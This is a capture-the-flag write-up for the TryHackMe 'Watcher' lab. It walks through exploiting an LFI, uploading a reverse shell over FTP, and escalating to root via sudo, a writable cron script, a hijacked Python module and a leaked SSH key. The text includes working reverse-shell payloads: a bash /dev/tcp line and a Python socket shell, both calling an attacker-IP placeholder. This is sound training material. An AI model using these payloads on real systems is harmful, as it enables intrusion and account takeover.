Watcher Write-up
Description
Watcher is a room on TryHackMe. It is a boot2root CTF. It has medium difficulty. In this room you have to collect 7 flags.
Enumeration
First of all we start with basic enumeration. We navigate to the web server on port 80. This web server contains a “robots.txt” file with two entries.
This will give you your first flag. We cannot read the “secret_file_do_not_read.txt” file. But the “post” parameter of the PHP script at “http://10.10.73.152/post.php” is prone to a LFI. We can read the /etc/passwd file with that vulnerability.
Next we can read the secret file with that LFI vulnerability by calling the URL “http://10.10.73.152/post.php?post=secret_file_do_not_read.txt”. The file contains FTP credentials. So now we know that FTP is also running on the target. We can assume that the FTP server is running on the standard port 21.
After connecting to the FTP server with ftp 10.10.73.152 we see a directory that is called “files” and a second flag.
Inside the “files” directory we have write access.
Initial Access
We can now upload a reverse shell into that directory. I have used the reverse shell from Pentestmonkey.
Next start a netcat listener with the command nc -lvnp 1234. From the previous note, we know that the FTP directory is located at /home/ftpuser/ftp/. So if we call the URL “http://10.10.73.152/post.php?post=/home/ftpuser/ftp/files/shell.php”, the web server will run the code and we will get a reverse shell.
Now we are on the machine as www-data user. As www-data user we can read the third flag, which is located at /var/www/html/more_secrets_a9f10a/flag_3.txt.
Privilege Escalation
During enumeration we can see that we can run all commands as toby user if we use sudo.
Now we can elevate our privileges to toby by running the command sudo -u toby /bin/bash. After enumerating more, we can spot an interesting cronjob. The script at home/toby/jobs/cow.sh is run as mat user every minute.
Luckily we have write privileges to that file. This means we can place a reverse shell into that file and elevate our privileges to mat. Write the following two lines into that file. You can use the echo command for this.
#!/bin/bash
bash -i >& /dev/tcp/YOUR_MACHINE_IP/8080 0>&1Next start a Netcat listener on your machine and wait until the mat user connects to you.
Inside mat’s home folder we can read the fifth flag and find this note.
As you can see we can run the script at /home/mat/scripts/will_script.py as will user. That Python script calls a function from another script called cmd.py.
We have write privileges for the cmd.py file.
So we can craft the following malicious Python script on our attacker machine and replace the original cmd.py by transferring it to the victim.
def get_command(num):
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_MACHINE_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])
if(num == "1"):
return "ls -lah"
if(num == "2"):
return "id"
if(num == "3"):
return "cat /etc/passwd"In the next step we will need to run another Netcat listener on port 1234 on our attacker machine. Finally execute the malicious script by running sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py. After that you should get a shell as will user. During enumeration as the will user we can find an interesting file inside /opt/backup. It contains a file called “key.b64”, which has base64 encoded data.
We can copy that file to our machine and decode it. You can use the command echo key.b64 | base64 -d > sshkey. This is a SSH key, which we can use to log in as root. First change the permissions with chmod 600 sshkey. After that log in as root with the command ssh -i sshkey root@10.10.73.152.
Mitigation
First of all a filter should be utilized to fix the LFI vulnerability. Furthermore no secret notes should be accessible through a public web server. Also privileges for files are set wrongly. These privileges should be fixed. It is also recommended that backups should be encrypted.
